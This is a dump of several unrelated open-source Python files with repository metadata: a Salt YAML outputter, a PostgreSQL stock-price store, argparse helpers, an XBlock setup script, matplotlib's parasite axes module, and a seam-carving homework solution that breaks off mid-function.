] | 1 | 2017-11-19T06:56:46.000Z | 2017-11-19T06:56:46.000Z | salt/output/yaml_out.py | z9g/salt | 26cc7ff467fd66cc7ac37a37fa3bcab42aa5ea4e | [
"Apache-2.0"
] | null | null | null | salt/output/yaml_out.py | z9g/salt | 26cc7ff467fd66cc7ac37a37fa3bcab42aa5ea4e | [
"Apache-2.0"
] | null | null | null | '''
Output data in YAML, this outputter defaults to printing in YAML block mode
for better readability.
'''
# Third Party libs
import yaml
def __virtual__():
return 'yaml'
def output(data):
'''
Print out YAML using the block mode
'''
return yaml.dump(data, default_flow_style=False)
| 16.210526 | 75 | 0.691558 |
39a435d4904a7a27d2a6184acb52353ab03027d2 | 3,965 | py | Python | data_api/StockData/database/postgreSQL.py | powerlim2/project_free_insight | 411bee0b36c1ffd6cf3644269a2056cbc71d44ba | [
"BSD-3-Clause"
] | 2 | 2020-08-23T20:21:08.000Z | 2021-01-16T00:21:43.000Z | data_api/StockData/database/postgreSQL.py | powerlim2/project_free_insight | 411bee0b36c1ffd6cf3644269a2056cbc71d44ba | [
"BSD-3-Clause"
] | null | null | null | data_api/StockData/database/postgreSQL.py | powerlim2/project_free_insight | 411bee0b36c1ffd6cf3644269a2056cbc71d44ba | [
"BSD-3-Clause"
] | null | null | null | from query.postgreSqlQuery import PostgreSqlQuery
from schema import tableSchema
import psycopg2
import database
import datetime
CURRENT_DATE = datetime.datetime.now().strftime('%Y-%m-%d')
class PostgreSQL(database.DB):
"""
Store Stock data into PostgreSQL DB
Static:
db_path: db access path
temp_stock_table_name: the name of temporary stock table (internal use)
Attributes:
stock_table_query: class to generate queries to work with STOCK table in postgreSQL DB.
Methods:
store_stock_price:
"""
__postgre_DB = __postgre_user = __postgre_password = 'insight'
__temp_stock_table_name = 'TEMP_STOCK'
__stock_table_name = 'STOCK'
def __init__(self):
super(self.__class__, self).__init__()
self.stock_table_query = PostgreSqlQuery(tableSchema.STOCK_TABLE_SCHEMA)
try:
argument = "dbname='{0}' user='{1}' password='{2}' host=localhost".format(self.__postgre_DB, self.__postgre_user, self.__postgre_password)
self.connection = psycopg2.connect(argument)
except Exception, errorStack:
print errorStack
raise Exception("Connection Error: unable to connect to postgreSQL DB")
def get_symbols(self, exchange):
"""
retrieve stock symbols
:param exchange: Symbol of Stock Exchange
"""
query = """SELECT symbol FROM SYMBOL WHERE exchange = '{0}';""".format(exchange)
cursor = self.connection.cursor()
cursor.execute(query)
rows = cursor.fetchall()
if len(rows) == 0:
raise Exception('DataNotAvailableException: No data available for the exchange: ' + exchange)
return [row[0] for row in rows]
def store_stock_price(self, stock_data):
"""
UPSERT (stock price, volume, date, dividend) data
:param stock_data: list of dicts
"""
if len(stock_data) == 0:
raise Exception('InvalidInputException: provide appropriate stock data')
self._delete_temp_stock_table()
self._create_temp_stock_table()
self._insert_stock_data_into_temp_table(stock_data)
self._update_and_insert_temp_data()
print """Successfully inserted {0} records into '{1}' table.""".format(len(stock_data), self.__stock_table_name)
return self
def _create_temp_stock_table(self):
create_query = self.stock_table_query.get_create_table_statement(self.__temp_stock_table_name)
cursor = self.connection.cursor()
cursor.execute(create_query)
self.connection.commit()
return self
def _insert_stock_data_into_temp_table(self, stock_data):
insert_query = self.stock_table_query.get_insert_table_statement(self.__temp_stock_table_name)
cursor = self.connection.cursor()
cursor.executemany(insert_query, stock_data)
cursor.execute(self.stock_table_query.get_lock_table_statement(self.__temp_stock_table_name))
self.connection.commit()
return self
def _update_and_insert_temp_data(self):
upsert_query = self.stock_table_query.get_upsert_table_statement(self.__stock_table_name, self.__temp_stock_table_name, CURRENT_DATE)
cursor = self.connection.cursor()
cursor.execute(upsert_query['UPDATE'])
cursor.execute(upsert_query['INSERT'])
self.connection.commit()
return self
def _delete_temp_stock_table(self):
if not self.stock_table_query:
raise Exception('NullClassException: stock_table_query is null!')
query = self.stock_table_query.get_drop_table_statement(self.__temp_stock_table_name)
try:
cursor = self.connection.cursor()
cursor.execute(query)
self.connection.commit()
return self
except Exception, error_stack:
print str(error_stack)
self.connection.rollback()
pass
| 34.780702 | 150 | 0.680454 |
61c241af78d5b01060d4c0ee7283d3b5a71caecb | 1,875 | py | Python | Language-Detector/src/helper.py | EKarton/English-French-Translator | da9cecce49498c4f79946a631206985f99daaed3 | [
"MIT"
] | 1 | 2021-07-10T04:49:23.000Z | 2021-07-10T04:49:23.000Z | Language-Detector/src/helper.py | EKarton/English-French-Translator | da9cecce49498c4f79946a631206985f99daaed3 | [
"MIT"
] | 7 | 2022-01-13T02:37:56.000Z | 2022-03-12T01:00:11.000Z | Language-Detector/src/helper.py | EKarton/English-French-Translator | da9cecce49498c4f79946a631206985f99daaed3 | [
"MIT"
] | 1 | 2020-09-05T10:45:52.000Z | 2020-09-05T10:45:52.000Z | import sys
import argparse
import os
import gzip
import torch
from torch import nn
import torch.nn.functional as F
class ModelCommandLineParser:
def __init__(self):
self.parser = argparse.ArgumentParser(description=__doc__)
def get_options(self, args):
return self.parser.parse_args(args)
def lower_bound(self, v, low=1):
v = int(v)
if v < low:
raise argparse.ArgumentTypeError(f"{v} must be at least {low}")
return v
def possible_gzipped_file(self, path, mode="r", encoding="utf8"):
if path.endswith(".gz"):
open_ = gzip.open
if mode[-1] != "b":
mode += "t"
else:
open_ = open
try:
f = open_(path, mode=mode, encoding=encoding)
except OSError as e:
raise argparse.ArgumentTypeError(f"can't open '{path}': {e}")
return f
def proportion(self, v, inclusive=False):
v = float(v)
if inclusive:
if v < 0.0 or v > 1.0:
raise argparse.ArgumentTypeError(f"{v} must be between [0, 1]")
else:
if v <= 0 or v >= 1:
raise argparse.ArgumentTypeError(f"{v} must be between (0, 1)")
return v
class ArgparseReadableDirAction(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
prospective_dir = values
if not os.path.isdir(prospective_dir):
raise argparse.ArgumentTypeError(
f"ArgparseReadableDirAction:{prospective_dir} is not a valid path"
)
if os.access(prospective_dir, os.R_OK):
setattr(namespace, self.dest, prospective_dir)
else:
raise argparse.ArgumentTypeError(
f"ArgparseReadableDirAction:{prospective_dir} is not a readable dir"
)
| 29.296875 | 84 | 0.589867 |
f8b740964dfcbfed9f9a749b0ca2b544797abb8f | 1,211 | py | Python | setup.py | raccoongang/xblock-in-video-collaboration | c3b46dc99bfe3198ec3648228fa073b0e1fc00df | [
"Apache-2.0"
] | null | null | null | setup.py | raccoongang/xblock-in-video-collaboration | c3b46dc99bfe3198ec3648228fa073b0e1fc00df | [
"Apache-2.0"
] | 4 | 2020-10-08T13:03:12.000Z | 2022-01-19T02:05:55.000Z | setup.py | raccoongang/xblock-in-video-collaboration | c3b46dc99bfe3198ec3648228fa073b0e1fc00df | [
"Apache-2.0"
] | 1 | 2020-10-08T12:59:28.000Z | 2020-10-08T12:59:28.000Z | """Setup for annoto XBlock."""
import os
from setuptools import setup
with open(os.path.join(os.path.dirname(__file__), 'README.md')) as readme:
README = readme.read()
def package_data(pkg, roots):
"""Generic function to find package_data.
All of the files under each of the `roots` will be declared as package
data for package `pkg`.
"""
data = []
for root in roots:
for dirname, _, files in os.walk(os.path.join(pkg, root)):
for fname in files:
data.append(os.path.relpath(os.path.join(dirname, fname), pkg))
return {pkg: data}
setup(
name='annoto-xblock',
version='1.0.0',
description='An XBlock for adding Annoto in-video collaboration solution to any video',
long_description=README,
license='Apache 2.0',
author='Annoto',
url='https://github.com/Annoto/xblock-in-video-collaboration',
packages=[
'annoto',
],
install_requires=[
'XBlock',
'xblock_utils',
'PyJWT',
],
entry_points={
'xblock.v1': [
'annoto = annoto:AnnotoXBlock',
]
},
package_data=package_data("annoto", ["static", "public", "translations"]),
)
| 23.745098 | 91 | 0.610239 |
b7ee444077f71639f7d2b19cbbb60c63ffff3025 | 13,912 | py | Python | venv/Lib/site-packages/mpl_toolkits/axes_grid1/parasite_axes.py | EkremBayar/bayar | aad1a32044da671d0b4f11908416044753360b39 | [
"MIT"
] | 603 | 2020-12-23T13:49:32.000Z | 2022-03-31T23:38:03.000Z | venv/Lib/site-packages/mpl_toolkits/axes_grid1/parasite_axes.py | EkremBayar/bayar | aad1a32044da671d0b4f11908416044753360b39 | [
"MIT"
] | 387 | 2020-12-15T14:54:04.000Z | 2022-03-31T07:00:21.000Z | venv/Lib/site-packages/mpl_toolkits/axes_grid1/parasite_axes.py | EkremBayar/bayar | aad1a32044da671d0b4f11908416044753360b39 | [
"MIT"
] | 35 | 2021-03-26T03:12:04.000Z | 2022-03-23T10:15:10.000Z | import functools
from matplotlib import _api
import matplotlib.artist as martist
import matplotlib.transforms as mtransforms
from matplotlib.axes import subplot_class_factory
from matplotlib.transforms import Bbox
from .mpl_axes import Axes
class ParasiteAxesBase:
def __init__(self, parent_axes, aux_transform=None,
*, viewlim_mode=None, **kwargs):
self._parent_axes = parent_axes
self.transAux = aux_transform
self.set_viewlim_mode(viewlim_mode)
kwargs["frameon"] = False
super().__init__(parent_axes.figure, parent_axes._position, **kwargs)
def cla(self):
super().cla()
martist.setp(self.get_children(), visible=False)
self._get_lines = self._parent_axes._get_lines
def get_images_artists(self):
artists = {a for a in self.get_children() if a.get_visible()}
images = {a for a in self.images if a.get_visible()}
return list(images), list(artists - images)
def pick(self, mouseevent):
# This most likely goes to Artist.pick (depending on axes_class given
# to the factory), which only handles pick events registered on the
# axes associated with each child:
super().pick(mouseevent)
# But parasite axes are additionally given pick events from their host
# axes (cf. HostAxesBase.pick), which we handle here:
for a in self.get_children():
if (hasattr(mouseevent.inaxes, "parasites")
and self in mouseevent.inaxes.parasites):
a.pick(mouseevent)
# aux_transform support
def _set_lim_and_transforms(self):
if self.transAux is not None:
self.transAxes = self._parent_axes.transAxes
self.transData = self.transAux + self._parent_axes.transData
self._xaxis_transform = mtransforms.blended_transform_factory(
self.transData, self.transAxes)
self._yaxis_transform = mtransforms.blended_transform_factory(
self.transAxes, self.transData)
else:
super()._set_lim_and_transforms()
def set_viewlim_mode(self, mode):
_api.check_in_list([None, "equal", "transform"], mode=mode)
self._viewlim_mode = mode
def get_viewlim_mode(self):
return self._viewlim_mode
@_api.deprecated("3.4", alternative="apply_aspect")
def update_viewlim(self):
return self._update_viewlim
def _update_viewlim(self): # Inline after deprecation elapses.
viewlim = self._parent_axes.viewLim.frozen()
mode = self.get_viewlim_mode()
if mode is None:
pass
elif mode == "equal":
self.axes.viewLim.set(viewlim)
elif mode == "transform":
self.axes.viewLim.set(
viewlim.transformed(self.transAux.inverted()))
else:
_api.check_in_list([None, "equal", "transform"], mode=mode)
def apply_aspect(self, position=None):
self._update_viewlim()
super().apply_aspect()
# end of aux_transform support
@functools.lru_cache(None)
def parasite_axes_class_factory(axes_class=None):
if axes_class is None:
_api.warn_deprecated(
"3.3", message="Support for passing None to "
"parasite_axes_class_factory is deprecated since %(since)s and "
"will be removed %(removal)s; explicitly pass the default Axes "
"class instead.")
axes_class = Axes
return type("%sParasite" % axes_class.__name__,
(ParasiteAxesBase, axes_class), {})
ParasiteAxes = parasite_axes_class_factory(Axes)
@_api.deprecated("3.4", alternative="ParasiteAxesBase")
class ParasiteAxesAuxTransBase:
def __init__(self, parent_axes, aux_transform, viewlim_mode=None,
**kwargs):
# Explicit wrapper for deprecation to work.
super().__init__(parent_axes, aux_transform,
viewlim_mode=viewlim_mode, **kwargs)
def _set_lim_and_transforms(self):
self.transAxes = self._parent_axes.transAxes
self.transData = self.transAux + self._parent_axes.transData
self._xaxis_transform = mtransforms.blended_transform_factory(
self.transData, self.transAxes)
self._yaxis_transform = mtransforms.blended_transform_factory(
self.transAxes, self.transData)
def set_viewlim_mode(self, mode):
_api.check_in_list([None, "equal", "transform"], mode=mode)
self._viewlim_mode = mode
def get_viewlim_mode(self):
return self._viewlim_mode
@_api.deprecated("3.4", alternative="apply_aspect")
def update_viewlim(self):
return self._update_viewlim()
def _update_viewlim(self): # Inline after deprecation elapses.
viewlim = self._parent_axes.viewLim.frozen()
mode = self.get_viewlim_mode()
if mode is None:
pass
elif mode == "equal":
self.axes.viewLim.set(viewlim)
elif mode == "transform":
self.axes.viewLim.set(
viewlim.transformed(self.transAux.inverted()))
else:
_api.check_in_list([None, "equal", "transform"], mode=mode)
def apply_aspect(self, position=None):
self._update_viewlim()
super().apply_aspect()
@_api.deprecated("3.4", alternative="parasite_axes_class_factory")
@functools.lru_cache(None)
def parasite_axes_auxtrans_class_factory(axes_class=None):
if axes_class is None:
_api.warn_deprecated(
"3.3", message="Support for passing None to "
"parasite_axes_auxtrans_class_factory is deprecated since "
"%(since)s and will be removed %(removal)s; explicitly pass the "
"default ParasiteAxes class instead.")
parasite_axes_class = ParasiteAxes
elif not issubclass(axes_class, ParasiteAxesBase):
parasite_axes_class = parasite_axes_class_factory(axes_class)
else:
parasite_axes_class = axes_class
return type("%sParasiteAuxTrans" % parasite_axes_class.__name__,
(ParasiteAxesAuxTransBase, parasite_axes_class),
{'name': 'parasite_axes'})
# Also deprecated.
with _api.suppress_matplotlib_deprecation_warning():
ParasiteAxesAuxTrans = parasite_axes_auxtrans_class_factory(ParasiteAxes)
class HostAxesBase:
def __init__(self, *args, **kwargs):
self.parasites = []
super().__init__(*args, **kwargs)
def get_aux_axes(self, tr=None, viewlim_mode="equal", axes_class=Axes):
"""
Add a parasite axes to this host.
Despite this method's name, this should actually be thought of as an
``add_parasite_axes`` method.
*tr* may be `.Transform`, in which case the following relation will
        hold: ``parasite.transData = tr + host.transData``. Alternatively, it
        may be None (the default), in which case no special relationship will
        hold between the parasite's and the host's ``transData``.
"""
parasite_axes_class = parasite_axes_class_factory(axes_class)
ax2 = parasite_axes_class(self, tr, viewlim_mode=viewlim_mode)
# note that ax2.transData == tr + ax1.transData
# Anything you draw in ax2 will match the ticks and grids of ax1.
self.parasites.append(ax2)
ax2._remove_method = self.parasites.remove
return ax2
def _get_legend_handles(self, legend_handler_map=None):
all_handles = super()._get_legend_handles()
for ax in self.parasites:
all_handles.extend(ax._get_legend_handles(legend_handler_map))
return all_handles
def draw(self, renderer):
orig_artists = list(self.artists)
orig_images = list(self.images)
if hasattr(self, "get_axes_locator"):
locator = self.get_axes_locator()
if locator:
pos = locator(self, renderer)
self.set_position(pos, which="active")
self.apply_aspect(pos)
else:
self.apply_aspect()
else:
self.apply_aspect()
rect = self.get_position()
for ax in self.parasites:
ax.apply_aspect(rect)
images, artists = ax.get_images_artists()
self.images.extend(images)
self.artists.extend(artists)
super().draw(renderer)
self.artists = orig_artists
self.images = orig_images
def cla(self):
for ax in self.parasites:
ax.cla()
super().cla()
def pick(self, mouseevent):
super().pick(mouseevent)
# Also pass pick events on to parasite axes and, in turn, their
# children (cf. ParasiteAxesBase.pick)
for a in self.parasites:
a.pick(mouseevent)
def twinx(self, axes_class=None):
"""
Create a twin of Axes with a shared x-axis but independent y-axis.
The y-axis of self will have ticks on the left and the returned axes
will have ticks on the right.
"""
ax = self._add_twin_axes(axes_class, sharex=self)
self.axis["right"].set_visible(False)
ax.axis["right"].set_visible(True)
ax.axis["left", "top", "bottom"].set_visible(False)
return ax
def twiny(self, axes_class=None):
"""
Create a twin of Axes with a shared y-axis but independent x-axis.
The x-axis of self will have ticks on the bottom and the returned axes
will have ticks on the top.
"""
ax = self._add_twin_axes(axes_class, sharey=self)
self.axis["top"].set_visible(False)
ax.axis["top"].set_visible(True)
ax.axis["left", "right", "bottom"].set_visible(False)
return ax
def twin(self, aux_trans=None, axes_class=None):
"""
Create a twin of Axes with no shared axis.
While self will have ticks on the left and bottom axis, the returned
axes will have ticks on the top and right axis.
"""
if aux_trans is None:
aux_trans = mtransforms.IdentityTransform()
ax = self._add_twin_axes(
axes_class, aux_transform=aux_trans, viewlim_mode="transform")
self.axis["top", "right"].set_visible(False)
ax.axis["top", "right"].set_visible(True)
ax.axis["left", "bottom"].set_visible(False)
return ax
def _add_twin_axes(self, axes_class, **kwargs):
"""
Helper for `.twinx`/`.twiny`/`.twin`.
*kwargs* are forwarded to the parasite axes constructor.
"""
if axes_class is None:
axes_class = self._get_base_axes()
ax = parasite_axes_class_factory(axes_class)(self, **kwargs)
self.parasites.append(ax)
ax._remove_method = self._remove_any_twin
return ax
def _remove_any_twin(self, ax):
self.parasites.remove(ax)
restore = ["top", "right"]
if ax._sharex:
restore.remove("top")
if ax._sharey:
restore.remove("right")
self.axis[tuple(restore)].set_visible(True)
self.axis[tuple(restore)].toggle(ticklabels=False, label=False)
def get_tightbbox(self, renderer, call_axes_locator=True,
bbox_extra_artists=None):
bbs = [
*[ax.get_tightbbox(renderer, call_axes_locator=call_axes_locator)
for ax in self.parasites],
super().get_tightbbox(renderer,
call_axes_locator=call_axes_locator,
bbox_extra_artists=bbox_extra_artists)]
return Bbox.union([b for b in bbs if b.width != 0 or b.height != 0])
@functools.lru_cache(None)
def host_axes_class_factory(axes_class=None):
if axes_class is None:
        _api.warn_deprecated(
            "3.3", message="Support for passing None to host_axes_class is "
            "deprecated since %(since)s and will be removed %(removal)s; "
"explicitly pass the default Axes class instead.")
axes_class = Axes
def _get_base_axes(self):
return axes_class
return type("%sHostAxes" % axes_class.__name__,
(HostAxesBase, axes_class),
{'_get_base_axes': _get_base_axes})
def host_subplot_class_factory(axes_class):
host_axes_class = host_axes_class_factory(axes_class)
subplot_host_class = subplot_class_factory(host_axes_class)
return subplot_host_class
HostAxes = host_axes_class_factory(Axes)
SubplotHost = subplot_class_factory(HostAxes)
def host_axes(*args, axes_class=Axes, figure=None, **kwargs):
"""
Create axes that can act as a hosts to parasitic axes.
Parameters
----------
figure : `matplotlib.figure.Figure`
Figure to which the axes will be added. Defaults to the current figure
`.pyplot.gcf()`.
*args, **kwargs
Will be passed on to the underlying ``Axes`` object creation.
"""
import matplotlib.pyplot as plt
host_axes_class = host_axes_class_factory(axes_class)
if figure is None:
figure = plt.gcf()
ax = host_axes_class(figure, *args, **kwargs)
figure.add_axes(ax)
plt.draw_if_interactive()
return ax
def host_subplot(*args, axes_class=Axes, figure=None, **kwargs):
"""
Create a subplot that can act as a host to parasitic axes.
Parameters
----------
figure : `matplotlib.figure.Figure`
Figure to which the subplot will be added. Defaults to the current
figure `.pyplot.gcf()`.
*args, **kwargs
Will be passed on to the underlying ``Axes`` object creation.
"""
import matplotlib.pyplot as plt
host_subplot_class = host_subplot_class_factory(axes_class)
if figure is None:
figure = plt.gcf()
ax = host_subplot_class(figure, *args, **kwargs)
figure.add_subplot(ax)
plt.draw_if_interactive()
return ax
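def _parasite_axes_usage_sketch():
    """Minimal, illustrative sketch of the host/parasite pattern above.

    Assumes a working pyplot backend; it simply plots two series against
    independent y-axes that share the same x-axis.
    """
    import matplotlib.pyplot as plt

    host = host_subplot(111)
    par = host.twinx()  # parasite axes: shared x-axis, its own right-hand y-axis
    host.plot([0, 1, 2], [0, 1, 2], label="host series")
    par.plot([0, 1, 2], [0, 50, 100], label="parasite series")
    host.legend()
    plt.show()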
| 35.580563 | 78 | 0.643186 |
2fc43e895a66ed08c4272e696a4bb08c264b2157 | 19,037 | py | Python | fall_2020/hw5_release/seam_carving.py | Victarry/CS131_release | da6497e4a6aa158950ed87033e6188fc8107f9f8 | [
"MIT"
] | null | null | null | fall_2020/hw5_release/seam_carving.py | Victarry/CS131_release | da6497e4a6aa158950ed87033e6188fc8107f9f8 | [
"MIT"
] | null | null | null | fall_2020/hw5_release/seam_carving.py | Victarry/CS131_release | da6497e4a6aa158950ed87033e6188fc8107f9f8 | [
"MIT"
] | null | null | null | """
CS131 - Computer Vision: Foundations and Applications
Assignment 4
Author: Donsuk Lee (donlee90@stanford.edu)
Date created: 09/2017
Last modified: 10/16/2020
Python Version: 3.5+
"""
import numpy as np
from skimage import color
def energy_function(image):
"""Computes energy of the input image.
For each pixel, we will sum the absolute value of the gradient in each direction.
Don't forget to convert to grayscale first.
Hint: Use np.gradient here
Args:
image: numpy array of shape (H, W, 3)
Returns:
out: numpy array of shape (H, W)
"""
H, W, _ = image.shape
out = np.zeros((H, W))
gray_image = color.rgb2gray(image)
### YOUR CODE HERE
out = np.sum(np.abs(np.gradient(gray_image)), axis=0)
### END YOUR CODE
return out
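# Small illustrative sanity check: a constant image has zero energy everywhere,
# and the energy map always has shape (H, W).
def _energy_function_example():
    flat = np.zeros((4, 5, 3))
    assert np.allclose(energy_function(flat), 0)
    img = np.random.rand(4, 5, 3)
    assert energy_function(img).shape == (4, 5)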
def compute_cost(image, energy, axis=1):
"""Computes optimal cost map (vertical) and paths of the seams.
Starting from the first row, compute the cost of each pixel as the sum of energy along the
lowest energy path from the top.
We also return the paths, which will contain at each pixel either -1, 0 or 1 depending on
where to go up if we follow a seam at this pixel.
In the case that energies are equal, choose the left-most path. Note that
    np.argmin returns the index of the first occurring minimum of the specified
axis.
Make sure your code is vectorized because this function will be called a lot.
You should only have one loop iterating through the rows.
We also recommend you create a stacked matrix with left, middle, and right costs
to make your cost and paths calculations easier.
Args:
image: not used for this function
(this is to have a common interface with compute_forward_cost)
energy: numpy array of shape (H, W)
axis: compute cost in width (axis=1) or height (axis=0)
Returns:
cost: numpy array of shape (H, W)
paths: numpy array of shape (H, W) containing values -1 (up and left), 0 (straight up), or 1 (up and right)
"""
energy = energy.copy()
if axis == 0:
energy = np.transpose(energy, (1, 0))
H, W = energy.shape
cost = np.zeros((H, W))
paths = np.zeros((H, W), dtype=np.int)
# Initialization
cost[0] = energy[0]
paths[0] = 0 # we don't care about the first row of paths
### YOUR CODE HERE
left_cost = np.zeros(W)
left_cost[0] = float('inf')
middel_cost = np.zeros(W)
right_cost = np.zeros(W)
right_cost[-1] = float('inf')
for i in range(1, H):
left_cost[1:] = cost[i-1, :-1]
middel_cost = cost[i-1]
right_cost[:-1] = cost[i-1, 1:]
stacked_cost = np.stack([left_cost, middel_cost, right_cost], axis=0) # (W, 3)
cost[i] = np.min(stacked_cost, axis=0) + energy[i]
paths[i] = np.argmin(stacked_cost, axis=0)-1
### END YOUR CODE
if axis == 0:
cost = np.transpose(cost, (1, 0))
paths = np.transpose(paths, (1, 0))
# Check that paths only contains -1, 0 or 1
assert np.all(np.any([paths == 1, paths == 0, paths == -1], axis=0)), \
"paths contains other values than -1, 0 or 1"
return cost, paths
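# Illustrative worked example: with the 3x3 energy map below, the left-most
# column is cheapest, so the cumulative cost accumulates down that column.
def _compute_cost_example():
    energy = np.array([[1., 2., 3.],
                       [4., 5., 6.],
                       [7., 8., 9.]])
    cost, paths = compute_cost(None, energy)
    # cost == [[ 1,  2,  3],
    #          [ 5,  6,  8],
    #          [12, 13, 15]]
    # and the cheapest seam ends at column np.argmin(cost[-1]) == 0.
    return cost, paths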
def backtrack_seam(paths, end):
"""Backtracks the paths map to find the seam ending at (H-1, end)
To do that, we start at the bottom of the image on position (H-1, end), and we
go up row by row by following the direction indicated by paths:
- left (value -1)
- middle (value 0)
- right (value 1)
Args:
paths: numpy array of shape (H, W) containing values -1, 0 or 1
        end: the seam ends at pixel (H - 1, end)
Returns:
seam: np.array of indices of shape (H,). The path pixels are the (i, seam[i])
"""
H, W = paths.shape
# initialize with -1 to make sure that everything gets modified
seam = - np.ones(H, dtype=np.int)
# Initialization
seam[H-1] = end
### YOUR CODE HERE
for i in range(H-2, -1, -1):
seam[i] = seam[i+1] + paths[i+1, seam[i+1]]
### END YOUR CODE
# Check that seam only contains values in [0, W-1]
assert np.all(np.all([seam >= 0, seam < W], axis=0)), "seam contains values out of bounds"
return seam
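# Illustrative example: with this paths map and end == 1, the seam is recovered
# bottom-up as [0, 1, 1] (each step adds -1, 0 or +1 to the column index).
def _backtrack_seam_example():
    paths = np.array([[0, 0, 0],
                      [0, -1, -1],
                      [1, 0, -1]])
    return backtrack_seam(paths, 1)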
def remove_seam(image, seam):
"""Remove a seam from the image.
This function will be helpful for functions reduce and reduce_forward.
Args:
image: numpy array of shape (H, W, C) or shape (H, W)
seam: numpy array of shape (H,) containing indices of the seam to remove
Returns:
out: numpy array of shape (H, W-1, C) or shape (H, W-1)
make sure that `out` has same type as `image`
"""
# Add extra dimension if 2D input
if len(image.shape) == 2:
image = np.expand_dims(image, axis=2)
out = None
H, W, C = image.shape
### YOUR CODE HERE
out = np.zeros((H, W-1, C), dtype=image.dtype)
for i in range(H):
out[i] = np.concatenate([image[i, :seam[i]], image[i, seam[i]+1:]], axis=0)
### END YOUR CODE
out = np.squeeze(out) # remove last dimension if C == 1
# Make sure that `out` has same type as `image`
assert out.dtype == image.dtype, \
"Type changed between image (%s) and out (%s) in remove_seam" % (image.dtype, out.dtype)
return out
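# Illustrative example: removing the seam [0, 1, 2] drops one pixel per row
# (column 0 in row 0, column 1 in row 1, column 2 in row 2), giving
# [[1, 2], [3, 5], [6, 7]].
def _remove_seam_example():
    img = np.arange(9).reshape(3, 3)
    return remove_seam(img, np.array([0, 1, 2]))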
def reduce(image, size, axis=1, efunc=energy_function, cfunc=compute_cost, bfunc=backtrack_seam, rfunc=remove_seam):
"""Reduces the size of the image using the seam carving process.
At each step, we remove the lowest energy seam from the image. We repeat the process
until we obtain an output of desired size.
SUPER IMPORTANT: IF YOU WANT TO PREVENT CASCADING ERRORS IN THE CODE OF reduce(), USE FUNCTIONS:
- efunc (instead of energy_function)
- cfunc (instead of compute_cost)
- bfunc (instead of backtrack_seam)
- rfunc (instead of remove_seam)
Args:
image: numpy array of shape (H, W, 3)
size: size to reduce height or width to (depending on axis)
axis: reduce in width (axis=1) or height (axis=0)
efunc: energy function to use
cfunc: cost function to use
bfunc: backtrack seam function to use
rfunc: remove seam function to use
Returns:
out: numpy array of shape (size, W, 3) if axis=0, or (H, size, 3) if axis=1
"""
out = np.copy(image)
if axis == 0:
out = np.transpose(out, (1, 0, 2))
H = out.shape[0]
W = out.shape[1]
assert W > size, "Size must be smaller than %d" % W
assert size > 0, "Size must be greater than zero"
### YOUR CODE HERE
for i in range(W-size):
energy = efunc(out)
cost, paths = cfunc(out, energy)
seam = bfunc(paths, np.argmin(cost[-1]))
out = rfunc(out, seam)
### END YOUR CODE
assert out.shape[1] == size, "Output doesn't have the right shape"
if axis == 0:
out = np.transpose(out, (1, 0, 2))
return out
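# Illustrative usage sketch: carving a random 25x30 image down to width 20
# removes ten vertical seams and leaves the height unchanged.
def _reduce_example():
    img = np.random.rand(25, 30, 3)
    out = reduce(img, 20)
    assert out.shape == (25, 20, 3)
    return out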
def duplicate_seam(image, seam):
    """Duplicates pixels of the seam, making each pixel on the seam path appear twice.
This function will be helpful in functions enlarge_naive and enlarge.
Args:
image: numpy array of shape (H, W, C)
seam: numpy array of shape (H,) of indices
Returns:
out: numpy array of shape (H, W+1, C)
"""
H, W, C = image.shape
out = np.zeros((H, W + 1, C))
### YOUR CODE HERE
for i in range(H):
out[i] = np.concatenate([image[i, :seam[i]+1], image[i, seam[i]:]], axis=0)
### END YOUR CODE
return out
def enlarge_naive(image, size, axis=1, efunc=energy_function, cfunc=compute_cost, bfunc=backtrack_seam, dfunc=duplicate_seam):
"""Increases the size of the image using the seam duplication process.
At each step, we duplicate the lowest energy seam from the image. We repeat the process
until we obtain an output of desired size.
SUPER IMPORTANT: IF YOU WANT TO PREVENT CASCADING ERRORS IN THE CODE OF enlarge_naive(), USE FUNCTIONS:
- efunc (instead of energy_function)
- cfunc (instead of compute_cost)
- bfunc (instead of backtrack_seam)
- dfunc (instead of duplicate_seam)
Args:
image: numpy array of shape (H, W, C)
size: size to increase height or width to (depending on axis)
axis: increase in width (axis=1) or height (axis=0)
efunc: energy function to use
cfunc: cost function to use
bfunc: backtrack seam function to use
dfunc: duplicate seam function to use
Returns:
out: numpy array of shape (size, W, C) if axis=0, or (H, size, C) if axis=1
"""
out = np.copy(image)
if axis == 0:
out = np.transpose(out, (1, 0, 2))
H = out.shape[0]
W = out.shape[1]
    assert size > W, "size must be greater than %d" % W
### YOUR CODE HERE
for i in range(size-W):
energy = efunc(out)
cost, paths = cfunc(out, energy)
seam = bfunc(paths, np.argmin(cost[-1]))
out = dfunc(out, seam)
### END YOUR CODE
if axis == 0:
out = np.transpose(out, (1, 0, 2))
return out
def find_seams(image, k, axis=1, efunc=energy_function, cfunc=compute_cost, bfunc=backtrack_seam, rfunc=remove_seam):
"""Find the top k seams (with lowest energy) in the image.
    We act as if we remove k seams from the image iteratively, but we need to store their
position to be able to duplicate them in function enlarge.
We keep track of where the seams are in the original image with the array seams, which
is the output of find_seams.
We also keep an indices array to map current pixels to their original position in the image.
SUPER IMPORTANT: IF YOU WANT TO PREVENT CASCADING ERRORS IN THE CODE OF find_seams(), USE FUNCTIONS:
- efunc (instead of energy_function)
- cfunc (instead of compute_cost)
- bfunc (instead of backtrack_seam)
- rfunc (instead of remove_seam)
Args:
image: numpy array of shape (H, W, C)
k: number of seams to find
axis: find seams in width (axis=1) or height (axis=0)
efunc: energy function to use
cfunc: cost function to use
bfunc: backtrack seam function to use
rfunc: remove seam function to use
Returns:
seams: numpy array of shape (H, W)
"""
image = np.copy(image)
if axis == 0:
image = np.transpose(image, (1, 0, 2))
H, W, C = image.shape
assert W > k, "k must be smaller than %d" % W
# Create a map to remember original pixel indices
# At each step, indices[row, col] will be the original column of current pixel
# The position in the original image of this pixel is: (row, indices[row, col])
# We initialize `indices` with an array like (for shape (2, 4)):
# [[1, 2, 3, 4],
# [1, 2, 3, 4]]
indices = np.tile(range(W), (H, 1)) # shape (H, W)
# We keep track here of the seams removed in our process
# At the end of the process, seam number i will be stored as the path of value i+1 in `seams`
# An example output for `seams` for two seams in a (3, 4) image can be:
# [[0, 1, 0, 2],
# [1, 0, 2, 0],
# [1, 0, 0, 2]]
seams = np.zeros((H, W), dtype=np.int)
# Iteratively find k seams for removal
for i in range(k):
# Get the current optimal seam
energy = efunc(image)
cost, paths = cfunc(image, energy)
end = np.argmin(cost[H - 1])
seam = bfunc(paths, end)
# Remove that seam from the image
image = rfunc(image, seam)
